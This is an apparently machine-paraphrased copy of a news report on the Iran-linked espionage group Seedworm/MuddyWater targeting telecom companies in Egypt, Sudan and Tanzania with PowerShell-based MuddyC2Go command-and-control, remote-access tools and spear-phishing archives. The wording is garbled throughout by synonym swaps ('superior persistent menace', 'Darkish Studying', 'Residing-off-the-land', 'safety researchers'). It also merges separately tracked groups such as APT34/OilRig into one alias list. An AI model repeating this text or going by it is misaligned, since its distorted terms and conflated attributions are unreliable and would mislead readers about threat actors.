An Iran-backed cyberespionage group is actively focusing on telcos in North and East Africa.
In response to safety researchers at Symantec, the most recent cyberattacks by the superior persistent menace (APT) it calls Seedworm (aka MuddyWater, APT34, Crambus, Helix Kitten, or OilRig) are focusing on telecommunications-sector organizations in Egypt, Sudan, and Tanzania. One telco-sector group specifically — beforehand infiltrated by Seedworm earlier in 2023 however up to now unnamed — is bearing the brunt of the most recent assaults.
Seedworm’s Energy(Shell) Play
The primary proof of malicious exercise got here from the execution of PowerShell code to attach right into a command-and-control (C2) framework known as MuddyC2Go, an infrastructure that researchers have beforehand linked to Seedworm.
“The attackers additionally use the SimpleHelp distant entry instrument and Venom Proxy, which have beforehand been related to Seedworm exercise, in addition to utilizing a customized keylogging instrument, and different publicly obtainable and living-off-the-land instruments,” Symantec researchers reported in a Dec. 19 evaluation of the cyberattacks.
Residing-off-the-land refers back to the observe of utilizing off-the-shelf know-how and native working system functions to cover malicious exercise. By misusing legit functions, attackers keep away from creating uncommon site visitors or exercise on compromised community, thereby decreasing their threat of detection.
Darkish Studying has approached Symantec for touch upon particulars of the most recent run of assaults by Seedworm, in addition to ideas for doable counter-measures.
Seeds of Doubt
Seedworm has been energetic for six years since 2017 and has been beforehand linked to Iran’s Ministry of Intelligence and Safety (MOIS). The group usually depends on spear-phishing emails containing archives, or hyperlinks to archives, that embrace varied legit distant administration instruments, together with the SimpleHelp and AnyDesk distant entry utilities.
If the supposed goal opens the file contained in the archive, it installs a distant administration instrument that enables the attacker to execute extra instruments and malware. Extra lately, the group has begun planting malware payloads inside password-protected RAR archives in a bid to evade detection by e-mail safety merchandise at focused organizations, in line with a current weblog submit by safety analysis agency Deep Intuition.
The newest malicious information being slung by the group comprise an embedded PowerShell script that mechanically connects to MuddyC2Go. This strategy removes the necessity for the handbook execution of scripts by the attackers.
Symantec’s researchers discovered that Seedworm usually targets authorities and personal organizations throughout varied sectors, together with telecommunications, native authorities, protection, and oil and pure gasoline. The group’s targets are principally Iran’s neighbors within the Center East area, together with Turkey, Israel, Iraq, United Arab Emirates, and Pakistan.
Iran’s Cyber Tradecraft
Iranian cyberespionage teams are recognized for establishing false personae on LinkedIn and elsewhere, in an effort to persuade targets to open malicious hyperlinks or attachments slightly than counting on unpatched vulnerabilities to hack into focused organizations.
Iran began closely investing in its cyber-operations program following the invention of notorious Stuxnet cyber-espionage weapon in 2010. The Stuxnet malware contaminated the supervisory management and information acquisition (SCADA) techniques at Iran’s nuclear amenities, notably its uranium enrichment centrifuges, and sabotaged their operation. Safety researchers attributed the malware to a joint US and Israeli intelligence operation.
Iran’s Islamic Revolutionary Guard Corps (IRGC) has since been linked disruptive and harmful assaults such because the Shamoon wiper malware assaults in opposition to oil and gasoline firms in Saudi Arabia and Qatar. Against this, MOIS is a civilian intelligence service largely specializing in the clandestine acquisition of intelligence — Seedworm has been named as a subordinate aspect or unit inside Iran’s MOIS.